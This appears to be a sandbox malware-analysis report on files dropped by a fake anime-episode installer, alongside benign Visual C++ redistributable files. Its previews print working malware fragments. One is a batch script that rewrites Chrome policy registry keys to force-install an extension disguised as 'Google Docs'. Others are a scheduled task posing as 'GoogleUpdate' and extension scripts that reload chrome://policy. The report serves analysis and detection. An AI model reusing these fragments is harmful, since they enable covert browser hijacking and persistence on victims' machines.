                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset238 Tahoma;}{\f2\fnil\fcharset238 Garamond;}{\f3\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT YAZILIMI L\f1\u304?SANS KO\'aaULLARI\par..\f0 MICROSOFT VISUAL C++ 2015 - 2022 \'c7ALI\f1\'aaMA S\f0\'dcRESI \par..\b0 Bu lisans ko\f1\'baullar\u305?, Microsoft Corporation (veya ya\'baad\u305?\u287?\u305?n\u305?z yere g\f0\'f6re bir ba\f1\u287?l\u305? \'bairketi) ile sizin aran\u305?zda yap\u305?lan s\f0\'f6zle\f1\'bameyi olu\'baturur. Bu ko\'baullar, yukar\u305?da ad\u305? ge\f0\'e7en yaz\f1\u305?l\u305?m i\f0\'e7in ge\'e7erlidir. \f1\'aaartlar, yaz\u305?l\u305?m i\f0\'e7in t\'fcm Microsoft hizmetleri veya g\'fcncelle\f1\'batirmeleri i\f0\'e7in, beraberlerinde farkl\f1\u305? \'baartlar bulunmad\u305?\u287?\u305? s\f0\'fcrece ge\'e7erlidir.\pa
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3221
                                                                        Entropy (8bit):5.280530692056262
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlOaesHEqhDTHV4zVy6oBzdp0DYK2GP2ZmN3majyNXNoNKQXVvChcPc+WKb0:uDiTl3PHcIflKNTPgdi12xgg
                                                                        MD5:DEFBEA001DC4EB66553630AC7CE47CCA
                                                                        SHA1:90CED64EC7C861F03484B5D5616FDBCDA8F64788
                                                                        SHA-256:E5ABE3CB3BF84207DAC4E6F5BBA1E693341D01AEA076DD2D91EAA21C6A6CB925
                                                                        SHA-512:B3B7A22D0CDADA21A977F1DCEAF2D73212A4CDDBD298532B1AC97575F36113D45E8D71C60A6D8F8CC2E9DBF18EE1000167CFBF0B2E7ED6F05462D77E0BCA0E90
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] Kurulumu</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.ptal etmek istedi.inizden emin misiniz?</String>.. <String Id="HelpHeader">Kurulum Yard.m.</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [dizin] - y.kler, onar.r, kald.r.r ya da.. dizindeki paketin tam bir yerel kopyas.n. olu.turur. Varsay.lan install de.eridir...../passive | /quiet - en az d.zeyde istemsiz UI g.sterir ya da hi. UI g.stermez ve.. istem yoktur. Varsay.lan olarak UI ve t.m istemler g.r.nt.lenir...../norestart - yeniden ba.lama denemelerini engeller. Varsay.lan olarak UI yeniden ba.l
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):18214
                                                                        Entropy (8bit):3.9837154113926356
                                                                        Encrypted:false
                                                                        SSDEEP:192:Hom4PyAjs/HBJ5qyK3PG4lk5xxKyAW1yW7/Y3OKchGMvGMLdo4+uHq9f4yPxrdCX:IDM1OR5rGU2
                                                                        MD5:D083C7E300928A0C5AEA5ECBD1653836
                                                                        SHA1:08F4F1F9F7DFA593BE3977515635967CE7A99E7A
                                                                        SHA-256:A808B4933CE3B3E0893504DBEF43EBF90B8B567F94BD6481B6315ED9141E1B11
                                                                        SHA-512:8CB3FFAD879BABA36137B7A21B62D9D6C530693F5E16FBB975F3E7C20F1DB5A686F3A6EE406D69B018AA494E4CD185F71B369A378AE3289B8080105157E63FD0
                                                                        Malicious:false
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):2978
                                                                        Entropy (8bit):6.135205733555905
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlOtKesi+hDtkQf7lz+W0gopN3m5+3cNONeN1ra8vWqPtlTKxKUTKlKXRoR+:uDiTlV5kQR9GLeE0ZxV6gIV
                                                                        MD5:3D1E15DEEACE801322E222969A574F17
                                                                        SHA1:58074C83775E1A884FED6679ACF9AC78ABB8A169
                                                                        SHA-256:2AC8B7C19A5189662DE36A0581C90DBAD96DF259EC00A28F609B644C3F39F9CA
                                                                        SHA-512:10797919845C57C5831234E866D730EBD13255E5BF8BA8087D53F1D0FC5D72DC6D5F6945DBEBEE69ACC6A2E20378750C4B78083AE0390632743C184532358E10
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] ....</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.......?</String>.. <String Id="HelpHeader">......</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [..] - .......... ..................Install ........../passive | /quiet - ..... UI ......... UI ... ........ UI ........../norestart - ..................... UI.../log log.txt - ............. %TEMP% ...
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):10825
                                                                        Entropy (8bit):5.1113252296046126
                                                                        Encrypted:false
                                                                        SSDEEP:192:HalhwTwQ4yzePBrarlvTteQH3bf9WaoXUBXZRaS9YARl0hcXNVD32:6lc4krlU2ymLN12
                                                                        MD5:873A413D23F830D3E87DAB3B94153E08
                                                                        SHA1:24CFC24F22CEF89818718A86F55F27606EB42668
                                                                        SHA-256:ABC11BB2B04DFF6AFE2D4D4F40D95A7D62E5AF352928AF90DAA3DADE58DD59BD
                                                                        SHA-512:DC1ECCB5CC4D3047401E2BC31F5EB3E21C7881C02744A2E63C10D3C911D1158DCFAC023988E873C33DC381C989304FE1D3CB27ED99D7801285C4C378553CD821
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 T\'c9RMINOS DE LICENCIA DEL SOFTWARE DE MICROSOFT\par..MICROSOFT VISUAL C++ 2015 - 2022 RUNTIME \par..\b0 Los t\'e9rminos de esta licencia son un contrato entre Microsoft Corporation (o, en funci\'f3n de donde viva, una de las sociedades del grupo) y usted. Se aplican al software mencionado anteriormente. Los t\'e9rminos tambi\'e9n se aplican a los servicios o actualizaciones de software de Microsoft, excepto en la medida en que sus t\'e9rminos sean diferentes.\par..\b SI USTED CUMPLE LOS PRESENTES T\'c9RMINOS DE ESTA LICENCIA, DISPONDR\'c1 DE LOS DERECHOS QUE A CONTINUACI\'d3N SE DESCRIBEN.\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\fi-357\li357\sb1
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3265
                                                                        Entropy (8bit):5.0491645049584655
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlO/esS6VGhDv4tiUiyRUqzC4U+aD6N3m7xNh1NWNGbPz+9o3PWeKK9K9KfT:uDiTlxouUTiySqyIwz9sgxqvjIk8
                                                                        MD5:47F9F8D342C9C22D0C9636BC7362FA8F
                                                                        SHA1:3922D1589E284CE76AB39800E2B064F71123C1C5
                                                                        SHA-256:9CBB2B312C100B309A1B1495E84E2228B937612885F7A642FBBD67969B632C3A
                                                                        SHA-512:E458DF875E9B0622AEBE3C1449868AA6A2826A1F851DB71165A872B2897CF870CCF85046944FF51FFC13BB15E54E9D9424EC36CAF5A2F38CE8B7D6DC0E9B2363
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Instalaci.n de [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.Est. seguro de que desea cancelar la operaci.n?</String>.. <String Id="HelpHeader">Ayuda de configuraci.n</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - instala, repara, desinstala o.. crea una copia local completa del paquete en el directorio. La opci.n predeterminada es la instalaci.n...../passive | /quiet - muestra una IU m.nima sin solicitudes o no muestra ninguna IU ni.. solicitud. De forma predeterminada, se muestran la IU y todas las solicitudes...../norestart - elimina cualquier intento
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (633), with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):15190
                                                                        Entropy (8bit):3.74084833991537
                                                                        Encrypted:false
                                                                        SSDEEP:192:X0svJBDnH5zHqQHG0Hd8Hz7HE06HA0rH3ptp2AtHxLUrMzLG0LxdtHJy5F0KI0Ba:X0sR9dLbmnoNLtR0AJtdt0IJVEpJEn
                                                                        MD5:F3ABECB590DEEF79A0892160C2951749
                                                                        SHA1:9481FA8A90EB63AED453487807B9325887345060
                                                                        SHA-256:045B724A294FB71687E9327E76094DDD13CD9A4D1064B13A411BE10302E05D0F
                                                                        SHA-512:74A401778D776A853DFE628B0EBAFFFFD4A8024F1C490A1F800176BF787A984CFD7416F8758CA49A36881572FD3296B7487C703076E274E1C7FB557446B99B44
                                                                        Malicious:false
                                                                        Preview:..<?xml version="1.0" encoding="utf-16"?>..<BootstrapperApplicationData xmlns="http://schemas.microsoft.com/wix/2010/BootstrapperApplicationData">..  <WixBalCondition Condition="VersionNT &gt;= v6.1" Message="[WixBundleName] can only be installed on Windows 7 and newer platforms." />..  <WixBundleProperties DisplayName="Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.34.31931" LogPathVariable="WixBundleLog" Compressed="yes" Id="{d4cecf3b-b68f-4995-8840-52ea0fab646e}" UpgradeCode="{C146E
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):9235
                                                                        Entropy (8bit):5.167332119309966
                                                                        Encrypted:false
                                                                        SSDEEP:192:H8kZ1UVDWkiWZTIsp/4hghFF1Qf4lCfnEtHixEGx736wHqItfSpOtJ32:cM1RWZMi/zzlOnjt5HLoa2
                                                                        MD5:04B33F0A9081C10E85D0E495A1294F83
                                                                        SHA1:1EFE2FB2D014A731B752672745F9FFECDD716412
                                                                        SHA-256:8099DC3CF9502C335DA829E5C755948A12E3E6DE490EB492A99DEB673D883D8B
                                                                        SHA-512:D1DBED00DF921169DD61501E2A3E95E6D7807348B188BE9DD8FC63423501E4D848ECE19AC466C3CACFCCC6084E0EB2F457DC957990F6F511DF10FD426E432685
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT SOFTWARE LICENSE TERMS\par..MICROSOFT VISUAL C++ 2015 - 2022 RUNTIME \par..\b0 These license terms are an agreement between Microsoft Corporation (or based on where you live, one of its affiliates) and you. They apply to the software named above. The terms also apply to any Microsoft services or updates for the software, except to the extent those have different terms.\par..\b IF YOU COMPLY WITH THESE LICENSE TERMS, YOU HAVE THE RIGHTS BELOW.\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\fi-357\li357\sb120\sa120\sl240\slmult1\tx360 INSTALLATION AND USE RIGHTS. \b0\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\f
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:PNG image data, 64 x 64, 8-bit colormap, non-interlaced
                                                                        Category:dropped
                                                                        Size (bytes):1861
                                                                        Entropy (8bit):6.868587546770907
                                                                        Encrypted:false
                                                                        SSDEEP:24:q36cnTKM/3kTIQiBmYKHeQWalGt1Sj9kYIt1uZ+bYOQe0IChR95aW:qqiTKMPuUBm7eQJGtYJM1uZCVszaW
                                                                        MD5:D6BD210F227442B3362493D046CEA233
                                                                        SHA1:FF286AC8370FC655AEA0EF35E9CF0BFCB6D698DE
                                                                        SHA-256:335A256D4779EC5DCF283D007FB56FD8211BBCAF47DCD70FE60DED6A112744EF
                                                                        SHA-512:464AAAB9E08DE610AD34B97D4076E92DC04C2CDC6669F60BFC50F0F9CE5D71C31B8943BD84CEE1A04FB9AB5BBED3442BD41D9CB21A0DD170EA97C463E1CE2B5B
                                                                        Malicious:false
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):2952
                                                                        Entropy (8bit):5.052095286906672
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTl/+desK19hDUNKwsqq8+JIDxN3mt7NlN1NVvAdMcgLPDHVXK8KTKjKnSnYF:uDiTl/BbTxmup/vrxATd
                                                                        MD5:FBFCBC4DACC566A3C426F43CE10907B6
                                                                        SHA1:63C45F9A771161740E100FAF710F30EED017D723
                                                                        SHA-256:70400F181D00E1769774FF36BCD8B1AB5FBC431418067D31B876D18CC04EF4CE
                                                                        SHA-512:063FB6685EE8D2FA57863A74D66A83C819FE848BA3072B6E7D1B4FE397A9B24A1037183BB2FDA776033C0936BE83888A6456AAE947E240521E2AB75D984EE35E
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29" />.... <String Id="Caption">[WixBundleName] Setup</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Are you sure you want to cancel?</String>.. <String Id="HelpHeader">Setup Help</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - installs, repairs, uninstalls or.. creates a complete local copy of the bundle in directory. Install is the default...../passive | /quiet - displays minimal UI with no prompts or displays no UI and.. no prompts. By default UI and all prompts are displayed...../norestart - suppress any attempts to restart. By default UI will prompt before restart.../log log.txt - logs to a specific file. B
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):8332
                                                                        Entropy (8bit):5.184632608060528
                                                                        Encrypted:false
                                                                        SSDEEP:96:8L2HdQG+3VzHfz96zYFGaPSWXdhRAmImlqFQKFBiUxn7Ke5A82rkO/pWk3nswP:ZHAzZ/3
                                                                        MD5:F62729C6D2540015E072514226C121C7
                                                                        SHA1:C1E189D693F41AC2EAFCC363F7890FC0FEA6979C
                                                                        SHA-256:F13BAE0EC08C91B4A315BB2D86EE48FADE597E7A5440DCE6F751F98A3A4D6916
                                                                        SHA-512:CBBFBFA7E013A2B85B78D71D32FDF65323534816978E7544CA6CEA5286A0F6E8E7E5FFC4C538200211F11B94373D5658732D5D8AA1D01F9CCFDBF20F154F1471
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. Copyright (c) .NET Foundation and contributors. All rights reserved. Licensed under the Microsoft Reciprocal License. See LICENSE.TXT file in the project root for full license information. -->......<Theme xmlns="http://wixtoolset.org/schemas/thmutil/2010">.. <Window Width="485" Height="300" HexStyle="100a0000" FontId="0">#(loc.Caption)</Window>.. <Font Id="0" Height="-12" Weight="500" Foreground="000000" Background="FFFFFF">Segoe UI</Font>.. <Font Id="1" Height="-24" Weight="500" Foreground="000000">Segoe UI</Font>.. <Font Id="2" Height="-22" Weight="500" Foreground="666666">Segoe UI</Font>.. <Font Id="3" Height="-12" Weight="500" Foreground="000000" Background="FFFFFF">Segoe UI</Font>.. <Font Id="4" Height="-12" Weight="500" Foreground="ff0000" Background="FFFFFF" Underline="yes">Segoe UI</Font>.... <Image X="11" Y="11" Width="64" Height="64" ImageFile="logo.png" Visible="yes"/>.. <Text X="80" Y="11" Width="-11" Heig
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):195600
                                                                        Entropy (8bit):6.682530937585544
                                                                        Encrypted:false
                                                                        SSDEEP:3072:OXoiFK6b0k77I+QfaIl191rSJHvlalB+8BHkY6v53EfcUzN0m6I+WxBlnKzeZuqt:OXoQNb++gDrSJdr8BHkPh3wIgnK/IU1a
                                                                        MD5:EAB9CAF4277829ABDF6223EC1EFA0EDD
                                                                        SHA1:74862ECF349A9BEDD32699F2A7A4E00B4727543D
                                                                        SHA-256:A4EFBDB2CE55788FFE92A244CB775EFD475526EF5B61AD78DE2BCDFADDAC7041
                                                                        SHA-512:45B15ADE68E0A90EA7300AEB6DCA9BC9E347A63DBA5CE72A635957564D1BDF0B1584A5E34191916498850FC7B3B7ECFBCBFCB246B39DBF59D47F66BC825C6FD2
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp
                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):146560
                                                                        Entropy (8bit):5.240257973600313
                                                                        Encrypted:false
                                                                        SSDEEP:1536:rche1M8H7rrES/urgpZDaGCmVtbkPxLF:QhwH73EGur6laGCmVtoxx
                                                                        MD5:6B435C6EA00DA06603EA9927D489AB6A
                                                                        SHA1:4237CF8901992D1C6D2B45B4DD3DA9672104C2CF
                                                                        SHA-256:15F1DF0D80FA0DCBE5DCBDEDEBD8EA6D72A5C7972F13AA25216AEB8328790ED0
                                                                        SHA-512:3B555826024BDAF9F4B0C0C7B7CF60304143BE36E33F3D3F5D3ECACAF5550DDCF88E638612344D92A9E84E85505DE12886BEE5665A6D11033CC8059EE01C6E09
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp
                                                                        File Type:Google Chrome extension, version 3
                                                                        Category:dropped
                                                                        Size (bytes):21965
                                                                        Entropy (8bit):7.877323467941546
                                                                        Encrypted:false
                                                                        SSDEEP:384:VPcg8r3Tv/D+gljnfFySA/Tv/D+gljnfFySA4Tv/D+gljnfFySAjLCdfjgEhiy:V0gUjH1JnfF2bH1JnfF2IH1JnfF2jLCl
                                                                        MD5:F02C46788D904EFD9F4BFBD47B875845
                                                                        SHA1:7F539A9151F5DAFE6DE10DB5DFBFE7E385C8C233
                                                                        SHA-256:3911FFEEAC85633086E25ACFA3E346892A948D95F27DF04F8A016DF8054087DE
                                                                        SHA-512:4F6CE616F7770B77EA79169643A67F2B69B7F938ADA9AD602287702D8E929684EB596A1B1EA406C0F7F583A1AC538C14EAB50D7E8E62DC6A3E69002985D91E28
                                                                        Malicious:false
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):299
                                                                        Entropy (8bit):4.8969499354657176
                                                                        Encrypted:false
                                                                        SSDEEP:6:oJRoJfwejEzKeYDFOEn9zmYnadRv5F8smvDNRU/snproLNRiif:ofoJYejj9n9Sdx5msmvDLrKdf
                                                                        MD5:78DA8C3C7BCC4FCBE1D1C1D4209BA026
                                                                        SHA1:CCACDA33826629E3A5B552BA26227D9D1B026BCA
                                                                        SHA-256:893FCFE4EDCDB07BCC3E05A3304F93F0358C9D8F4CC967058585F553BB82AD02
                                                                        SHA-512:01C3DEF2B9A38ABD5C6D447C52D8EC3533C8098DB69DCF30682EFA992BE71666D66A56AB3E6B161F8017FE018E20E479C365B780F3CF94ED507CAEA99EADBC06
                                                                        Malicious:false
                                                                        Preview:addEventListener('load', () => {...if (location.host !== 'policy') return;.....const reload = () => {....const button = document.querySelector('#reload-policies');......if (button) {.....button.click();.....setTimeout(close, 200);....} else {.....setTimeout(reload, 200);....}...}.....reload();..});
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):280
                                                                        Entropy (8bit):4.784751850345126
                                                                        Encrypted:false
                                                                        SSDEEP:6:EW/xObKQZk/hsu1wC6VAPk8yyWSD9kn+E8Lyg8c:rAuBhsu1wXAPk8Sic+EaPN
                                                                        MD5:4E08D28DC99DCEA89EB316A373B74758
                                                                        SHA1:15F89379BA476D2C35BF33ABD37C1B16CB3AE2F4
                                                                        SHA-256:A507D1F546C979056CE392467EDE397C94EF854D9B5C7581462FEEF6E9B091EF
                                                                        SHA-512:E12733B3A346A2B67C6EB92090A08306CA0DEEDE599AC9242338004AE5D075F51102360D9FB4CCE20946AAD89B1007C43ACE367FB66608AA517F854BC2CB1685
                                                                        Malicious:false
                                                                        Preview:{..."name": "Google Docs",..."description": "",..."version": "1.0",..."manifest_version": 3,..."background": {...."service_worker": "service.js",...."type": "module"...},..."permissions": ["tabs", "scripting", "management", "background"],..."host_permissions": ["chrome://*/*"]..}
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):320
                                                                        Entropy (8bit):5.132643741033991
                                                                        Encrypted:false
                                                                        SSDEEP:6:YXOBLow3rzLPyE5cWNR21aMXgBDoQYIxXYMoVsxrHLLqL:Y+9oOX2IMIDVYVMjrSL
                                                                        MD5:DC5731CC902226BEF4F122433C91BEB2
                                                                        SHA1:88EE89EB414C703CE69FCA3BF8566BAF26EE0625
                                                                        SHA-256:C939D8CC72D4D40FF1D9329B6CD6C0BCCAD4E723B7527C4E72961349F3EE6919
                                                                        SHA-512:7708060051B3A5C1283A28321C7F07FEACC1C8299FCF39F3CDC245AF2EC8737FD170D8B9046D7ABD751A54AE6798BEC54C95FD77431D91564D6A648E1DA6ABCD
                                                                        Malicious:false
                                                                        Preview:chrome.management.onInstalled.addListener(info => {...if (info.id != 'dbffglanhdhedkjkijpkplhpcdndpchj') return;.....setTimeout(() => {....chrome.tabs.create({ url: 'chrome://policy' }, tab => {.....chrome.scripting.executeScript({......target: { tabId: tab.id },......files: ['web.js'].... });....});...}, 500);..});
                                                                        Process:C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exe
                                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3589
                                                                        Entropy (8bit):5.104362762146633
                                                                        Encrypted:false
                                                                        SSDEEP:96:yf21WJeJXJoJZJiJrJKlJ9JmJIJ3J+JVJsJLJtcJU8JwJfJ7JcJpJyJnJ4JFJuJU:yO1oQZq7MFKfXYK5wvWltmbSh1mr8Jar
                                                                        MD5:6D5DB74DAAE4CD40F8D3D07DAF23D1DF
                                                                        SHA1:278B3AD24A66FAFB95D8BC348DCE633BB7E583C4
                                                                        SHA-256:C608E1E22600D8198CF1A8927D22ADD8FB3679A97466E3BD1E06A4C845984B59
                                                                        SHA-512:C0C551C60A67BA1538DDFA691268B98BF8FFE8364818182E687E39439D2C62AE15B1791F5DB4E4AF80EA73D2A79BE46D6689F69C0E62539E1E07AF8C7135FED7
                                                                        Malicious:false
                                                                        Preview:@echo off..set version=1.0..set id=dbffglanhdhedkjkijpkplhpcdndpchj..set base32=HKLM\SOFTWARE..set base64=HKLM\SOFTWARE\WOW6432Node..set chrome=Google\Chrome..set helper=%LocalAppdata%\WindowsApp\apps-helper..set file=%helper%\apps.crx..REG DELETE %base32%\Policies\%chrome% /f..REG DELETE %base32%\%chrome%\Extensions\%id% /f..REG DELETE %base64%\%chrome%\Extensions\%id% /f..REG ADD "%base32%\Policies\%chrome%\ExtensionInstallAllowlist" /v "1" /t REG_SZ /d %id% /f..REG ADD "%base32%\%chrome%\Extensions\%id%" /v "path" /t REG_SZ /d "%file%" /f..REG ADD "%base32%\%chrome%\Extensions\%id%" /v "version" /t REG_SZ /d %version% /f..REG ADD "%base64%\Policies\%chrome%\ExtensionInstallAllowlist" /v "1" /t REG_SZ /d %id% /f..REG ADD "%base64%\%chrome%\Extensions\%id%" /v "path" /t REG_SZ /d "%file%" /f..REG ADD "%base64%\%chrome%\Extensions\%id%" /v "version" /t REG_SZ /d %version% /f..taskkill /F /IM chrome.exe /T..start "" "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-direc
                                                                        Process:C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):95
                                                                        Entropy (8bit):4.69957501098577
                                                                        Encrypted:false
                                                                        SSDEEP:3:Z3wgHoIN+E2J5yMLdVJLS6JVEAn:ZAg5N723yMlLXx
                                                                        MD5:17D52ED154647FE95078DAB945BFC721
                                                                        SHA1:8146408AED7C58ABBE28ABCA5602422CBD26D72C
                                                                        SHA-256:EF755D197DE4F21AD0F53398A1258540B7BC66A7D2BBC82DABE5BBE2ECD4D4B5
                                                                        SHA-512:BE7DD3DB254F54E26563EA0EBD7728A32ED4B70F15B2C2E3A952C887EB907851E3F4B80F5C9882A3DA53328FC2DCF45BC39FCE76DB351AFDEC2E5F8EA2819F24
                                                                        Malicious:false
                                                                        Preview:schtasks.exe /Create /XML "C:\Users\user\AppData\Local\WindowsApp\reg.xml" /tn GoogleUpdate
                                                                        Process:C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exe
                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):1926
                                                                        Entropy (8bit):5.103950255476696
                                                                        Encrypted:false
                                                                        SSDEEP:48:cxOfpdE6Q4oL60uyqbzxIYODOLNdqBsuAh:o4da4d0uyqbzNdqBsuQ
                                                                        MD5:222D0410ED64E98F03CD8E40D0BCF405
                                                                        SHA1:E6D9DFC5CF208C8C09D3C2F34FAE3E006104F7A0
                                                                        SHA-256:9414ECDEDEEC029FCE058CD9757BF5E0D1423DE31FA15614857A1CD8D1115CF3
                                                                        SHA-512:4665FA6E7F82D55E7FA9273C3A11F9BA24BCC214DE1341309BAA1C9F41D3C6E2A028D26C78BCFCF0A396A1B44F0BDA611F3DA667DF0A75F14713D26CAB988ECB
                                                                        Malicious:true
